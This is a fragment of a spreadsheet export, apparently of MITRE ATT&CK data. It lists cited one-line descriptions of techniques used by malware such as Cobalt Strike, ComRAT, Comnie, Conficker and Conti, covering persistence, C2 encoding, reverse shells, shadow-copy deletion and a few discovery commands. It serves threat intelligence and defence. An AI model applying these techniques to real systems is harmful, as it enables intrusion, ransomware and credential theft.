    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can SSH to a remote service.(Citation: Cobalt Strike TTPs Dec 2017)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>relationship--75c238d1-f2dc-413a-89c3-66797a65da90</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can set its Beacon payload to reach out to the C2 server on an arbitrary and random interval.(Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>relationship--6d5dfa51-1e2b-4da5-9db8-ae8e8f00ea9d</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154)'s Beacon payload is capable of capturing screenshots.(Citation: cobaltstrike manual)(Citation: Amnesty Intl. Ocean Lotus February 2021)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>relationship--4183341a-f5ed-4914-9dc5-0eb7c1d6c4e6</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can recover hashed passwords.(Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>relationship--dc7e8f00-d57c-4cfd-971c-510ede375c2f</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</si>
  <si>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</si>
  <si>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relationship--155a8883-7b22-4fa8-8d2f-bd76c8efd5b3</t>
  </si>
  <si>
    <t>The [Cobalt Strike](https://attack.mitre.org/software/S0154) System Profiler can discover applications through the browser and identify the version of Java the target has.(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>relationship--3407bbe8-bceb-42f1-824b-d92d9972d917</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use Base64, URL-safe Base64, or NetBIOS encoding in its C2 traffic.(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>relationship--cbf79556-91df-45cf-a64b-1dd01025ac8d</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use &lt;code&gt;sudo&lt;/code&gt; to run a command.(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>relationship--00991be5-e2c2-4645-b743-e9e4af3d38b9</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) has the ability to use AES-256 symmetric encryption in CBC mode with HMAC-SHA-256 to encrypt task commands and XOR to encrypt shell code and configuration data.(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>relationship--c7aa0575-5434-4a42-ae9d-9a7a52eac99b</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can determine the NetBios name and  the IP addresses of targets machines including domain controllers.(Citation: Cyberreason Anchor December 2019)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>relationship--12798001-5af6-4b47-b17e-e98888c1482c</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can produce a sessions report from compromised hosts.(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>relationship--4bf260f4-0a10-49d9-b930-e1293f40e693</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can enumerate services on compromised hosts.(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>relationship--6017ff5f-e522-45fe-857a-e4fef38a6349</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can timestomp any files or payloads placed on a target machine to help them blend in.(Citation: cobaltstrike manual)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>relationship--61e9d783-571b-49d4-a30b-8fde8a13d4c0</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can steal access tokens from exiting processes.(Citation: cobaltstrike manual)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>relationship--56ff911a-d7bb-4176-8e1f-bf0f46cc7f89</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use VBA to perform execution.(Citation: Cobalt Strike TTPs Dec 2017)(Citation: CobaltStrike Daddy May 2017)(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>relationship--5a166a20-4191-429c-9fd0-f566a86f0753</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</si>
  <si>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</si>
  <si>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relationship--a3567e77-aa1c-45dd-8217-e24df76e5def</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</si>
  <si>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</si>
  <si>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relationship--fc901b6f-3575-443c-9ba3-32ca1bebf7af</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use WMI to deliver a payload to a remote host.(Citation: cobaltstrike manual)(Citation: Cobalt Strike Manual 4.3 November 2020)(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>relationship--db1a20ca-55a0-42db-b0e5-d600478baddd</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use &lt;code&gt;WinRM&lt;/code&gt; to execute a payload on a remote host.(Citation: cobaltstrike manual)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>relationship--c5bab3a0-69b6-4ef6-97b3-3f3aecd710f8</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can install a new service.(Citation: Cobalt Strike TTPs Dec 2017)</t>
  </si>
  <si>
    <t>relationship--59cb4ff6-e1fd-4088-905f-2ade864dabb0</t>
  </si>
  <si>
    <t>S0338</t>
  </si>
  <si>
    <t>Cobian RAT</t>
  </si>
  <si>
    <t>malware--aa1462a1-d065-416c-b354-bedd04998c7f</t>
  </si>
  <si>
    <t>[Cobian RAT](https://attack.mitre.org/software/S0338) has a feature to perform voice recording on the victim’s machine.(Citation: Zscaler Cobian Aug 2017)</t>
  </si>
  <si>
    <t>relationship--97d2fa02-bccc-43c3-8c1d-e3667b710e5e</t>
  </si>
  <si>
    <t>[Cobian RAT](https://attack.mitre.org/software/S0338) uses DNS for C2.(Citation: Zscaler Cobian Aug 2017)</t>
  </si>
  <si>
    <t>relationship--94c08652-89f8-406d-b0c0-aeb35da36d99</t>
  </si>
  <si>
    <t>[Cobian RAT](https://attack.mitre.org/software/S0338) has a feature to perform keylogging on the victim’s machine.(Citation: Zscaler Cobian Aug 2017)</t>
  </si>
  <si>
    <t>relationship--8907c952-38f8-49de-900d-4f2fa0c485c1</t>
  </si>
  <si>
    <t>[Cobian RAT](https://attack.mitre.org/software/S0338) creates an autostart Registry key to ensure persistence.(Citation: Zscaler Cobian Aug 2017)</t>
  </si>
  <si>
    <t>relationship--22260fda-fb95-4cf4-9e23-ba8662157c1f</t>
  </si>
  <si>
    <t>[Cobian RAT](https://attack.mitre.org/software/S0338) has a feature to perform screen capture.(Citation: Zscaler Cobian Aug 2017)</t>
  </si>
  <si>
    <t>relationship--0f64f141-1f0f-4374-879d-b08f0fda8979</t>
  </si>
  <si>
    <t>[Cobian RAT](https://attack.mitre.org/software/S0338) obfuscates communications with the C2 server using Base64 encoding.(Citation: Zscaler Cobian Aug 2017)</t>
  </si>
  <si>
    <t>relationship--a70a6fbd-379d-4104-8323-ce25a950c892</t>
  </si>
  <si>
    <t>[Cobian RAT](https://attack.mitre.org/software/S0338) has a feature to access the webcam on the victim’s machine.(Citation: Zscaler Cobian Aug 2017)</t>
  </si>
  <si>
    <t>relationship--17bee216-d5ff-4e66-b221-0129be41b4f5</t>
  </si>
  <si>
    <t>[Cobian RAT](https://attack.mitre.org/software/S0338) can launch a remote command shell interface for executing commands.(Citation: Zscaler Cobian Aug 2017)</t>
  </si>
  <si>
    <t>relationship--543fe202-892b-4282-b691-090029b56b1f</t>
  </si>
  <si>
    <t>S0369</t>
  </si>
  <si>
    <t>CoinTicker</t>
  </si>
  <si>
    <t>malware--d1531eaa-9e17-473e-a680-3298469662c3</t>
  </si>
  <si>
    <t>[CoinTicker](https://attack.mitre.org/software/S0369) decodes the initially-downloaded hidden encoded file using OpenSSL.(Citation: CoinTicker 2019)</t>
  </si>
  <si>
    <t>relationship--a6944696-304c-4813-8285-56275e926f9f</t>
  </si>
  <si>
    <t>[CoinTicker](https://attack.mitre.org/software/S0369) downloads the EggShell mach-o binary using curl, which does not set the quarantine flag.(Citation: CoinTicker 2019)</t>
  </si>
  <si>
    <t>relationship--f4eabef1-c66d-45b2-a7c7-6c4cefe4862b</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</si>
  <si>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</si>
  <si>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relationship--3078d200-79f5-41d1-a0db-afe1501d650a</t>
  </si>
  <si>
    <t>[CoinTicker](https://attack.mitre.org/software/S0369) executes a Python script to download its second stage.(Citation: CoinTicker 2019)</t>
  </si>
  <si>
    <t>relationship--9a5f9534-a2a4-402e-89bd-d014c2fba224</t>
  </si>
  <si>
    <t xml:space="preserve">[CoinTicker](https://attack.mitre.org/software/S0369) creates user launch agents named .espl.plist and com.apple.[random string].plist to establish persistence.(Citation: CoinTicker 2019)	</t>
  </si>
  <si>
    <t>relationship--ad257565-2097-4cdc-9a52-3e54a7188f02</t>
  </si>
  <si>
    <t>[CoinTicker](https://attack.mitre.org/software/S0369) initially downloads a hidden encoded file.(Citation: CoinTicker 2019)</t>
  </si>
  <si>
    <t>relationship--342502b6-c8fc-4ed5-ba10-209a824b78ed</t>
  </si>
  <si>
    <t>relationship--b85862ff-5bde-4f6e-8483-901bab69a3a2</t>
  </si>
  <si>
    <t>[CoinTicker](https://attack.mitre.org/software/S0369) executes a bash script to establish a reverse shell.(Citation: CoinTicker 2019)</t>
  </si>
  <si>
    <t>relationship--7d20cbaf-a154-4192-9a97-ef2662d07246</t>
  </si>
  <si>
    <t>relationship--c3e64d41-3fa0-459f-be6f-a39860e4c05c</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</si>
  <si>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</si>
  <si>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relationship--217ad0a6-f693-416e-9ae4-bcc0c533ce9f</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) has the ability to use the Gmail web UI to receive commands and exfiltrate information.(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020)</t>
  </si>
  <si>
    <t>relationship--6ff34c78-2c85-4be5-b3db-0ec8543087d9</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</si>
  <si>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</si>
  <si>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relationship--488fe004-cb37-4e15-a847-99c32b4fd757</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</si>
  <si>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</si>
  <si>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relationship--64309b21-2dc2-4369-9c70-66f47f5c4b56</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</si>
  <si>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</si>
  <si>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relationship--ad8fdfa4-5e0b-437d-9723-9bc5a272f465</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</si>
  <si>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</si>
  <si>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relationship--39647c47-c73d-4da7-9b1a-8c67f20c1890</t>
  </si>
  <si>
    <t xml:space="preserve">[ComRAT](https://attack.mitre.org/software/S0126) has embedded a XOR encrypted communications module inside the orchestrator module.(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020) </t>
  </si>
  <si>
    <t>relationship--d27ca417-0ced-4e42-b81c-fe93cfe7e1c7</t>
  </si>
  <si>
    <t xml:space="preserve">[ComRAT](https://attack.mitre.org/software/S0126) has stored encrypted orchestrator code and payloads in the Registry.(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020) </t>
  </si>
  <si>
    <t>relationship--414a365a-e24b-44f2-8130-77435f2e18ef</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) has used a portable FAT16 partition image placed in %TEMP% as a hidden file system.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>relationship--150e1b1c-a575-4542-a66e-c1646212744b</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) can use email attachments for command and control.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>relationship--0b2b0719-c82e-4d1f-b34c-7ed5dd5c8968</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) has used a task name associated with Windows SQM Consolidator.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>relationship--f4303403-0d93-4267-ba4c-a1d4e20d87cd</t>
  </si>
  <si>
    <t xml:space="preserve">[ComRAT](https://attack.mitre.org/software/S0126) has modified Registry values to store encrypted orchestrator code and payloads.(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020) </t>
  </si>
  <si>
    <t>relationship--c2496cf4-b502-44cf-ae85-efb9b882a4b1</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) can load a PE file from memory or the file system and execute it with &lt;code&gt;CreateProcessW&lt;/code&gt;.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>relationship--7eaf474f-7755-41d7-96c6-811889457be2</t>
  </si>
  <si>
    <t xml:space="preserve">[ComRAT](https://attack.mitre.org/software/S0126) has encrypted its virtual file system using AES-256 in XTS mode.(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020) </t>
  </si>
  <si>
    <t>relationship--3a86072e-4ca6-4b5d-bf31-b17c250f572e</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</si>
  <si>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</si>
  <si>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relationship--bdac1391-310e-4511-b272-b80924166723</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) can check the default browser by querying &lt;code&gt;HKCR\http\shell\open\command&lt;/code&gt;.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>relationship--b511900a-9bfe-4f8c-b1e2-b95669a5eaeb</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) has used a scheduled task to launch its PowerShell loader.(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020)</t>
  </si>
  <si>
    <t>relationship--19153106-5607-4cac-91a5-c2a900bc5343</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) has been programmed to sleep outside local business hours (9 to 5, Monday to Friday).(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>relationship--55465e2f-104a-440e-aa6b-24f1476fc86d</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) can check the victim's default browser to determine which process to inject its communications module into.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>relationship--31029adf-2b28-4d7f-bdd3-b07f55374eae</t>
  </si>
  <si>
    <t xml:space="preserve">[ComRAT](https://attack.mitre.org/software/S0126) has checked the victim system's date and time to perform tasks during business hours (9 to 5, Monday to Friday).(Citation: CISA ComRAT Oct 2020) </t>
  </si>
  <si>
    <t>relationship--c7c1411a-42c8-4d7e-9b56-0465370759de</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) has used HTTP requests for command and control.(Citation: NorthSec 2015 GData Uroburos Tools)(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020)</t>
  </si>
  <si>
    <t>relationship--1782abeb-8d28-42a1-8abe-c137f23b282c</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) has used &lt;code&gt;cmd.exe&lt;/code&gt; to execute commands.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>relationship--9800fd7a-d2e1-4188-a991-7b8e09edaa13</t>
  </si>
  <si>
    <t>S0244</t>
  </si>
  <si>
    <t>Comnie</t>
  </si>
  <si>
    <t>malware--f4c80d39-ce10-4f74-9b50-a7e3f5df1f2e</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) executes a batch script to store discovery information in %TEMP%\info.dat and then uploads the temporarily file to the remote C2 server.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>relationship--228e71e2-0e76-4020-a850-7a568412259b</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) uses blogs and third-party sites (GitHub, tumbler, and BlogSpot) to avoid DNS-based blocking of their communication to the command and control server.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>relationship--3674346a-5212-4b42-9c1d-3e73eee95d06</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) appends a total of 64MB of garbage data to a file to deter any security products in place that may be scanning files on disk.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>relationship--e4e36dcb-9c07-4c22-a182-61ac194a434f</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) uses the &lt;code&gt;net user&lt;/code&gt; command.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>relationship--47a10b36-7f39-480c-8708-410eb3af46ca</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) uses RC4 and Base64 to obfuscate strings.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>relationship--ff3d2ebf-ea7b-4fd2-a524-9a6f20bcf3e3</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) uses the &lt;code&gt;tasklist&lt;/code&gt; to view running processes on the victim’s machine.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>relationship--3c210990-7596-4773-a640-adf44490d08d</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) achieves persistence by adding a shortcut of itself to the startup path in the Registry.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>relationship--d490bb02-7dfc-4808-8109-29a3871f830a</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) runs the &lt;code&gt;net view&lt;/code&gt; command</t>
  </si>
  <si>
    <t>relationship--77fbad9a-3a73-4ddb-8d10-60147eb64a81</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) uses Rundll32 to load a malicious DLL.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>relationship--c07df1c1-3ae1-4974-af37-9c1b04cef14a</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) attempts to detect several anti-virus products.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>relationship--26289101-47e6-47a5-bc9f-19bf918721d6</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) establishes persistence via a .lnk file in the victim’s startup path.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>relationship--7cb37ba3-3a4b-45e5-974c-e337301e71a2</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) encrypts command and control communications with RC4.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>relationship--93f51dcb-f2cf-4aa2-880d-c2b9388252ff</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) collects the hostname of the victim machine.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>relationship--b22e151c-4919-4160-9f5c-143484948003</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) uses &lt;code&gt;ipconfig /all&lt;/code&gt; and &lt;code&gt;route PRINT&lt;/code&gt; to identify network adapter and interface information.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>relationship--4053d6f5-e594-4b52-96a2-2b7c0fa7d332</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) executes the &lt;code&gt;netstat -ano&lt;/code&gt; command.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>relationship--705fdfa4-6b23-480c-b31a-eadb41533439</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) runs the command: &lt;code&gt;net start &gt;&gt; %TEMP%\info.dat&lt;/code&gt; on a victim.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>relationship--0c294d8b-2ee4-47ee-b9d8-8378d9d89ba1</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) executes VBS scripts.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>relationship--87c25621-eef0-49ae-b4ef-9eac3b7ef841</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) uses HTTP for C2 communication.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>relationship--7ee6890f-748e-419e-a442-7dd44e29958a</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) executes BAT scripts.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>relationship--264be7f9-61e1-4e9e-aa4a-aa4a7420f3b3</t>
  </si>
  <si>
    <t>S0608</t>
  </si>
  <si>
    <t>Conficker</t>
  </si>
  <si>
    <t>malware--58eddbaf-7416-419a-ad7b-e65b9d4c3b55</t>
  </si>
  <si>
    <t>[Conficker](https://attack.mitre.org/software/S0608) terminates various services related to system security and Windows.(Citation: SANS Conficker)</t>
  </si>
  <si>
    <t>relationship--ca060f84-0042-43b2-ae17-48b4952c0570</t>
  </si>
  <si>
    <t>23 February 2021</t>
  </si>
  <si>
    <t>[Conficker](https://attack.mitre.org/software/S0608) has used a DGA that seeds with the current UTC victim system date to generate domains.(Citation: SANS Conficker)(Citation: Trend Micro Conficker)</t>
  </si>
  <si>
    <t>relationship--98339175-97d1-4a17-985f-914efffa2a4e</t>
  </si>
  <si>
    <t>[Conficker](https://attack.mitre.org/software/S0608) exploited the MS08-067 Windows vulnerability for remote code execution through a crafted RPC request.(Citation: SANS Conficker)</t>
  </si>
  <si>
    <t>relationship--b56b122d-0a12-4b1a-854e-5c0826603121</t>
  </si>
  <si>
    <t>[Conficker](https://attack.mitre.org/software/S0608) downloads an HTTP server to the infected machine.(Citation: SANS Conficker)</t>
  </si>
  <si>
    <t>relationship--fa443fec-23f0-40dd-8a94-06cd19f4eb86</t>
  </si>
  <si>
    <t>[Conficker](https://attack.mitre.org/software/S0608) resets system restore points and deletes backup files.(Citation: SANS Conficker)</t>
  </si>
  <si>
    <t>relationship--e2b49348-8590-42a9-8b38-871c2eb3ada1</t>
  </si>
  <si>
    <t>[Conficker](https://attack.mitre.org/software/S0608) adds keys to the Registry at &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services&lt;/code&gt; and various other Registry locations.(Citation: SANS Conficker)(Citation: Trend Micro Conficker)</t>
  </si>
  <si>
    <t>relationship--150667a8-2155-4500-b7bb-c2d6bbc568b8</t>
  </si>
  <si>
    <t>[Conficker](https://attack.mitre.org/software/S0608) scans for other machines to infect.(Citation: SANS Conficker)</t>
  </si>
  <si>
    <t>relationship--cac01499-50ef-4cbf-a223-6879c139173a</t>
  </si>
  <si>
    <t>[Conficker](https://attack.mitre.org/software/S0608) has obfuscated its code to prevent its removal from host machines.(Citation: Trend Micro Conficker)</t>
  </si>
  <si>
    <t>relationship--b9de1f4c-1978-4efe-9bd0-f525b6acaeb1</t>
  </si>
  <si>
    <t>[Conficker](https://attack.mitre.org/software/S0608) adds Registry Run keys to establish persistence.(Citation: Trend Micro Conficker)</t>
  </si>
  <si>
    <t>relationship--9020cfe5-99b4-48ba-ac48-bcf20697c575</t>
  </si>
  <si>
    <t>[Conficker](https://attack.mitre.org/software/S0608) variants used the Windows AUTORUN feature to spread through USB propagation.(Citation: SANS Conficker)(Citation: Trend Micro Conficker)</t>
  </si>
  <si>
    <t>relationship--f308adef-2601-41b2-9da8-b785a7adf06c</t>
  </si>
  <si>
    <t>[Conficker](https://attack.mitre.org/software/S0608) variants spread through NetBIOS share propagation.(Citation: SANS Conficker)</t>
  </si>
  <si>
    <t>relationship--78e4027f-b5ff-4cb3-8b27-ab931baf3476</t>
  </si>
  <si>
    <t>[Conficker](https://attack.mitre.org/software/S0608) uses the current UTC victim system date for domain generation and connects to time servers to determine the current date.(Citation: SANS Conficker)(Citation: Trend Micro Conficker)</t>
  </si>
  <si>
    <t>relationship--3074f3bd-5a30-4ad2-9a2c-45b1573a454e</t>
  </si>
  <si>
    <t>[Conficker](https://attack.mitre.org/software/S0608) copies itself into the &lt;code&gt;%systemroot%\system32&lt;/code&gt; directory and registers as a service.(Citation: SANS Conficker)</t>
  </si>
  <si>
    <t>relationship--25a8672d-3d99-456b-a8c6-2ea5f3a5a688</t>
  </si>
  <si>
    <t>[ConnectWise](https://attack.mitre.org/software/S0591) can be used to execute PowerShell commands on target machines.(Citation: Anomali Static Kitten February 2021)</t>
  </si>
  <si>
    <t>relationship--8fba0fad-b83d-4252-b7ef-c4d1b3529cba</t>
  </si>
  <si>
    <t>[ConnectWise](https://attack.mitre.org/software/S0591) can take screenshots on remote hosts.(Citation: Anomali Static Kitten February 2021)</t>
  </si>
  <si>
    <t>relationship--c4d751fa-60cc-4254-9737-d7df6518eabe</t>
  </si>
  <si>
    <t>[ConnectWise](https://attack.mitre.org/software/S0591) can record video on remote hosts.(Citation: Anomali Static Kitten February 2021)</t>
  </si>
  <si>
    <t>relationship--63c952f9-1fec-46db-a2f3-f87114180f25</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</si>
  <si>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</si>
  <si>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relationship--97ef26b5-5dda-458b-926e-933ec0d099d6</t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) has decrypted its payload using a hardcoded AES-256 key.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020)</t>
  </si>
  <si>
    <t>relationship--2ca546e0-6a3f-4a9f-82c3-2e41ffa67b79</t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) has loaded an encrypted DLL into memory and then executes it.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020)</t>
  </si>
  <si>
    <t>relationship--cd79adbd-3d52-4f26-aea4-cbbbc3d6aa66</t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) can discover files on a local system.(Citation: CarbonBlack Conti July 2020)</t>
  </si>
  <si>
    <t>relationship--707f2ce7-a09f-4df4-8b48-3106a63da041</t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) can delete Windows Volume Shadow Copies using &lt;code&gt;vssadmin&lt;/code&gt;.(Citation: CarbonBlack Conti July 2020)</t>
  </si>
  <si>
    <t>relationship--9e22871c-2e16-4c81-903c-e081c140f7a2</t>
  </si>
  <si>
    <t>18 February 2021</t>
  </si>
  <si>
    <t xml:space="preserve">[Conti](https://attack.mitre.org/software/S0575) has used API calls during execution.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020) </t>
  </si>
  <si>
    <t>relationship--f9a82ef5-524a-4b95-a9b5-560e61f3d2fa</t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) can enumerate remote open SMB network shares using &lt;code&gt;NetShareEnum()&lt;/code&gt;.(Citation: CarbonBlack Conti July 2020)(Citation: CrowdStrike Wizard Spider October 2020)</t>
  </si>
  <si>
    <t>relationship--0852ea69-52d5-46d0-9847-3af87c8b15dc</t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) can use compiler-based obfuscation for its code, encrypt DLLs, and hide Windows API calls.(Citation: CarbonBlack Conti July 2020)(Citation: Cybereason Conti Jan 2021)(Citation: CrowdStrike Wizard Spider October 2020)</t>
  </si>
  <si>
    <t>relationship--9cc5bd19-ab08-4eb7-886b-ce55fde60421</t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) can enumerate through all open processes to search for any that have the string “sql” in their process name.(Citation: CarbonBlack Conti July 2020)</t>
  </si>
  <si>
    <t>relationship--eacc205b-b8f9-4427-b8bd-3eba5a5a6179</t>
  </si>
  <si>
    <t xml:space="preserve">
[Conti](https://attack.mitre.org/software/S0575) has the ability to discover hosts on a target network.(Citation: CrowdStrike Wizard Spider October 2020)</t>
  </si>
  <si>
    <t>relationship--9c424acf-2a41-4b34-867f-590ade731fc2</t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) can spread via SMB and encrypts files on different hosts, potentially compromising an entire network.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020)</t>
  </si>
  <si>
    <t>relationship--00789efc-c0c5-4bc2-96ad-9f893bf9c06d</t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) can stop up to 146 Windows services related to security, backup, database, and email solutions through the use of &lt;code&gt;net stop&lt;/code&gt;.(Citation: CarbonBlack Conti July 2020)</t>
  </si>
  <si>
    <t>relationship--59cb7691-e0a0-4e34-94ae-63d3e22f21c1</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</si>
  <si>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</si>
  <si>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relationship--773a86d4-07a9-4e10-9321-24f3da72ae00</t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) can enumerate routine network connections from a compromised host.(Citation: CarbonBlack Conti July 2020)</t>
  </si>
  <si>
    <t>relationship--a92a6707-1c22-42b2-9968-2aead300d2da</t>
  </si>
  <si>
    <t xml:space="preserve">[Conti](https://attack.mitre.org/software/S0575) can spread itself by infecting other remote machines via network shared drives.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020) </t>
  </si>
  <si>
    <t>relationship--d9cb5add-4191-4c2e-bcde-25336748804c</t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) can utilize command line options to allow an attacker control over how it scans and encrypts files.(Citation: CarbonBlack Conti July 2020)(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>relationship--e5fea1b8-e72c-4d5a-84a7-5545bc2f5dc3</t>
  </si>
  <si>
    <t>S0492</t>
  </si>
  <si>
    <t>CookieMiner</t>
  </si>
  <si>
    <t>malware--eedc01d5-95e6-4d21-bcd4-1121b1df4586</t>
  </si>
  <si>
    <t xml:space="preserve">[CookieMiner](https://attack.mitre.org/software/S0492) has used base64 encoding to obfuscate scripts on the system.(Citation: Unit42 CookieMiner Jan 2019) </t>
  </si>
  <si>
    <t>relationship--d3142001-8501-474a-a0cd-2e12bba52148</t>
  </si>
  <si>
    <t>22 July 2020</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) can steal saved usernames and passwords in Chrome as well as credit card credentials.(Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>relationship--19bfa4e1-509b-417a-9bcc-b739f7d798a7</t>
  </si>
